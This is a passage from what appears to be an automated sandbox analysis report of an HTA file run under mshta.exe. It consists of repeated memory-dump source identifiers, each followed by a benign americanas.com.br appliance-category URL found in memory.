00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/pecas-para-eletrodomesticos
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770422568.000000000929A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714183267.0000000009A53000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edom
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edommeta.largemeta.large.hei
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667189470.000000000C11D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_hm_tt_1_0_eletrodom
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_home_edom_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/aspirador-de-po?chave=pfm_hm_tt_1_0_aspirado
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/batedeira?chave=pfm_hm_tt_1_0_batedeira
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/bebedouro-e-purificador-de-agua/purificador-
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/cafeteira?chave=pfm_hm_tt_1_0_cafeteira
Source: mshta.exe, 00000000.00000003.2670798916.0000000006ED4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751923492.0000000006ED6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/ferro-de-passar?chave=pfm_hm_tt_1_0_ferro-de
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/forno-eletrico?chave=pfm_hm_tt_1_0_forno-ele
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/fritadeira-eletrica?chave=pfm_hm_tt_1_0_frit
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775794335.000000000C086000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667250908.000000000C085000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/grill-e-sanduicheira?chave=pfm_hm_tt_1_0_gri
Source: mshta.exe, 00000000.00000003.2670798916.0000000006ED4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713650880.00000000065AC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695470306.00000000065AA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705796688.00000000065AB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654867106.00000000065A3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751923492.0000000006ED6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/liquidificador?chave=pfm_hm_tt_1_0_liquidifi
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/maquina-de-costura?chave=pfm_hm_tt_1_0_maqui
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666676210.000000000C132000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 